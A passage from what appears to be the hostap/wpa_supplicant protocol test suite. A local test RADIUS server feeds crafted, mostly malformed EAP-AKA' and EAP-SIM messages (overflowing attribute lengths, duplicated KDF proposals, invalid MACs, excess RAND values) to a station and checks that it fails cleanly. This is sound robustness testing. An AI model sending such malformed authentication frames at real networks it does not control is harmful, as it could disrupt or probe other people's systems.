            if i in [ 0, 15 ]:
                time.sleep(0.1)
            else:
                ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
                                       timeout=10)
                if ev is None:
                    raise Exception("Timeout on EAP failure")
            dev[0].request("REMOVE_NETWORK all")
    finally:
        stop_radius_server(srv)
def test_eap_proto_aka_prime(dev, apdev):
    """EAP-AKA' protocol tests

    Drives a local RADIUS server through a scripted sequence of crafted
    (mostly malformed) EAP-AKA' messages and verifies that the station
    either proceeds or reports EAP failure for each step.
    """
    def aka_prime_handler(ctx, req):
        # Stateful handler: ctx['num'] counts requests seen so far and
        # selects the next crafted message; ctx['id'] tracks the EAP id.
        # NOTE(review): req.encode("hex") is Python 2 only — presumably
        # this file predates a Python 3 port.
        logger.info("aka_prime_handler - RX " + req.encode("hex"))
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] = ctx['num'] + 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256
        idx = 0

        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing payload")
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1,
                               EAP_TYPE_AKA_PRIME)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with no attributes")
            return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with empty AT_KDF_INPUT")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with AT_KDF_INPUT")
            return struct.pack(">BBHBBHBBHBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
                               ord('c'), ord('d'))
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with duplicated KDF")
            return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 3 * 4,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
                               ord('c'), ord('d'),
                               EAP_SIM_AT_KDF, 1, 1,
                               EAP_SIM_AT_KDF, 1, 2,
                               EAP_SIM_AT_KDF, 1, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with multiple KDF proposals")
            return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 3 * 4,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
                               ord('c'), ord('d'),
                               EAP_SIM_AT_KDF, 1, 255,
                               EAP_SIM_AT_KDF, 1, 254,
                               EAP_SIM_AT_KDF, 1, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with incorrect KDF selected")
            return struct.pack(">BBHBBHBBHBBBBBBHBBHBBHBBH",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4 * 4,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
                               ord('c'), ord('d'),
                               EAP_SIM_AT_KDF, 1, 255,
                               EAP_SIM_AT_KDF, 1, 255,
                               EAP_SIM_AT_KDF, 1, 254,
                               EAP_SIM_AT_KDF, 1, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with multiple KDF proposals")
            return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 3 * 4,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
                               ord('c'), ord('d'),
                               EAP_SIM_AT_KDF, 1, 255,
                               EAP_SIM_AT_KDF, 1, 254,
                               EAP_SIM_AT_KDF, 1, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with selected KDF not duplicated")
            return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 3 * 4,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
                               ord('c'), ord('d'),
                               EAP_SIM_AT_KDF, 1, 1,
                               EAP_SIM_AT_KDF, 1, 255,
                               EAP_SIM_AT_KDF, 1, 254)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with multiple KDF proposals")
            return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 3 * 4,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
                               ord('c'), ord('d'),
                               EAP_SIM_AT_KDF, 1, 255,
                               EAP_SIM_AT_KDF, 1, 254,
                               EAP_SIM_AT_KDF, 1, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with selected KDF duplicated (missing MAC, RAND, AUTN)")
            return struct.pack(">BBHBBHBBHBBBBBBHBBHBBHBBH",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4 * 4,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
                               ord('c'), ord('d'),
                               EAP_SIM_AT_KDF, 1, 1,
                               EAP_SIM_AT_KDF, 1, 255,
                               EAP_SIM_AT_KDF, 1, 254,
                               EAP_SIM_AT_KDF, 1, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with multiple unsupported KDF proposals")
            return struct.pack(">BBHBBHBBHBBBBBBHBBH",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 2 * 4,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
                               ord('c'), ord('d'),
                               EAP_SIM_AT_KDF, 1, 255,
                               EAP_SIM_AT_KDF, 1, 254)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with multiple KDF proposals")
            return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 3 * 4,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
                               ord('c'), ord('d'),
                               EAP_SIM_AT_KDF, 1, 255,
                               EAP_SIM_AT_KDF, 1, 254,
                               EAP_SIM_AT_KDF, 1, 1)
        idx += 1
        if ctx['num'] == idx:
            # Fix: removed stray ')' from the original log message
            logger.info("Test: Challenge with invalid MAC, RAND, AUTN values")
            return struct.pack(">BBHBBHBBHBBBBBBHBBHBBHBBHBBH4LBBH4LBBH4L",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4 * 4 + 20 + 20 + 20,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
                               ord('c'), ord('d'),
                               EAP_SIM_AT_KDF, 1, 1,
                               EAP_SIM_AT_KDF, 1, 255,
                               EAP_SIM_AT_KDF, 1, 254,
                               EAP_SIM_AT_KDF, 1, 1,
                               EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0,
                               EAP_SIM_AT_RAND, 5, 0, 0, 0, 0, 0,
                               EAP_SIM_AT_AUTN, 5, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            # Fix: removed stray ')' from the original log message
            logger.info("Test: Challenge - AMF separation bit not set")
            return struct.pack(">BBHBBHBBHBBBBBBHBBH4LBBH4LBBH4L",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4 + 20 + 20 + 20,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
                               ord('c'), ord('d'),
                               EAP_SIM_AT_KDF, 1, 1,
                               EAP_SIM_AT_MAC, 5, 0, 1, 2, 3, 4,
                               EAP_SIM_AT_RAND, 5, 0, 5, 6, 7, 8,
                               EAP_SIM_AT_AUTN, 5, 0, 9, 10,
                               0x2fda8ef7, 0xbba518cc)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge - Invalid MAC")
            return struct.pack(">BBHBBHBBHBBBBBBHBBH4LBBH4LBBH4L",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4 + 20 + 20 + 20,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
                               ord('c'), ord('d'),
                               EAP_SIM_AT_KDF, 1, 1,
                               EAP_SIM_AT_MAC, 5, 0, 1, 2, 3, 4,
                               EAP_SIM_AT_RAND, 5, 0, 5, 6, 7, 8,
                               EAP_SIM_AT_AUTN, 5, 0, 0xffffffff, 0xffffffff,
                               0xd1f90322, 0x40514cb4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge - Valid MAC")
            return struct.pack(">BBHBBHBBHBBBBBBHBBH4LBBH4LBBH4L",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4 + 20 + 20 + 20,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
                               ord('c'), ord('d'),
                               EAP_SIM_AT_KDF, 1, 1,
                               EAP_SIM_AT_MAC, 5, 0,
                               0xf4a3c1d3, 0x7c901401, 0x34bd8b01, 0x6f7fa32f,
                               EAP_SIM_AT_RAND, 5, 0, 5, 6, 7, 8,
                               EAP_SIM_AT_AUTN, 5, 0, 0xffffffff, 0xffffffff,
                               0xd1f90322, 0x40514cb4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid AT_KDF_INPUT length")
            return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 0xffff, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid AT_KDF length")
            return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_KDF, 2, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with large number of KDF proposals")
            return struct.pack(">BBHBBHBBHBBHBBHBBHBBHBBHBBHBBHBBHBBHBBHBBH",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 12 * 4,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF, 1, 255,
                               EAP_SIM_AT_KDF, 1, 254,
                               EAP_SIM_AT_KDF, 1, 253,
                               EAP_SIM_AT_KDF, 1, 252,
                               EAP_SIM_AT_KDF, 1, 251,
                               EAP_SIM_AT_KDF, 1, 250,
                               EAP_SIM_AT_KDF, 1, 249,
                               EAP_SIM_AT_KDF, 1, 248,
                               EAP_SIM_AT_KDF, 1, 247,
                               EAP_SIM_AT_KDF, 1, 246,
                               EAP_SIM_AT_KDF, 1, 245,
                               EAP_SIM_AT_KDF, 1, 244)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        return None

    srv = start_radius_server(aka_prime_handler)
    if srv is None:
        return "skip"
    try:
        hapd = start_ap(apdev[0]['ifname'])
        # One connection attempt per scripted handler step; step 0 is a
        # valid exchange (only a short wait), the rest must end in failure.
        for i in range(0, 16):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="AKA'", identity="6555444333222111",
                           password="5122250214c33e723a5dd523fc145fc0:981d464c7c52eb6e5036234984ad0bcf:000000000123",
                           wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            if i in [ 0 ]:
                time.sleep(0.1)
            else:
                ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
                                       timeout=10)
                if ev is None:
                    raise Exception("Timeout on EAP failure")
            dev[0].request("REMOVE_NETWORK all")
    finally:
        stop_radius_server(srv)
def test_eap_proto_sim(dev, apdev):
    """EAP-SIM protocol tests"""
    def sim_handler(ctx, req):
        # Stateful handler: ctx['num'] counts requests seen so far and
        # selects the next crafted (mostly malformed) EAP-SIM message so
        # the station's parser/error paths are exercised step by step.
        # NOTE(review): req.encode("hex") is Python 2 only — presumably
        # this file predates a Python 3 port.
        logger.info("sim_handler - RX " + req.encode("hex"))
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] = ctx['num'] + 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256
        idx = 0

        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing payload")
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1,
                               EAP_TYPE_SIM)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected AT_AUTN")
            return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_AUTN, 2, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too short AT_VERSION_LIST")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_VERSION_LIST, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: AT_VERSION_LIST overflow")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_VERSION_LIST, 1, 0xffff)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected AT_AUTS")
            return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_AUTS, 2, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected AT_CHECKCODE")
            return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_CHECKCODE, 2, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: No AT_VERSION_LIST in Start")
            return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: No support version in AT_VERSION_LIST")
            return struct.pack(">BBHBBHBBH4B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_VERSION_LIST, 2, 3, 2, 3, 4, 5)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request without ID type")
            return struct.pack(">BBHBBHBBH2H", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request ANY_ID")
            return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
                               EAP_SIM_AT_ANY_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request ANY_ID (duplicate)")
            return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
                               EAP_SIM_AT_ANY_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request ANY_ID")
            return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
                               EAP_SIM_AT_ANY_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request FULLAUTH_ID")
            return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
                               EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request FULLAUTH_ID (duplicate)")
            return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
                               EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request ANY_ID")
            return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
                               EAP_SIM_AT_ANY_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request FULLAUTH_ID")
            return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
                               EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request PERMANENT_ID")
            return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
                               EAP_SIM_AT_PERMANENT_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request PERMANENT_ID (duplicate)")
            return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
                               EAP_SIM_AT_PERMANENT_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: No AT_MAC and AT_RAND in Challenge")
            return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CHALLENGE, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: No AT_RAND in Challenge")
            return struct.pack(">BBHBBHBBH4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 20,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Insufficient number of challenges in Challenge")
            return struct.pack(">BBHBBHBBH4LBBH4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 20 + 20,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_RAND, 5, 0, 0, 0, 0, 0,
                               EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too many challenges in Challenge")
            return struct.pack(">BBHBBHBBH4L4L4L4LBBH4L", EAP_CODE_REQUEST,
                               ctx['id'],
                               4 + 1 + 3 + 4 + 4 * 16 + 20,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_RAND, 17, 0, 0, 0, 0, 0, 0, 0, 0, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Same RAND multiple times in Challenge")
            return struct.pack(">BBHBBHBBH4L4L4LBBH4L", EAP_CODE_REQUEST,
                               ctx['id'],
                               4 + 1 + 3 + 4 + 3 * 16 + 20,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_RAND, 13, 0, 0, 0, 0, 0, 0, 0, 0, 1,
                               0, 0, 0, 0,
                               EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Notification with no attributes")
            return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Notification indicating success, but no MAC")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
                               EAP_SIM_AT_NOTIFICATION, 1, 32768)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Notification indicating success, but invalid MAC value")
            return struct.pack(">BBHBBHBBHBBH4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4 + 20,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
                               EAP_SIM_AT_NOTIFICATION, 1, 32768,
                               EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Notification before auth")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
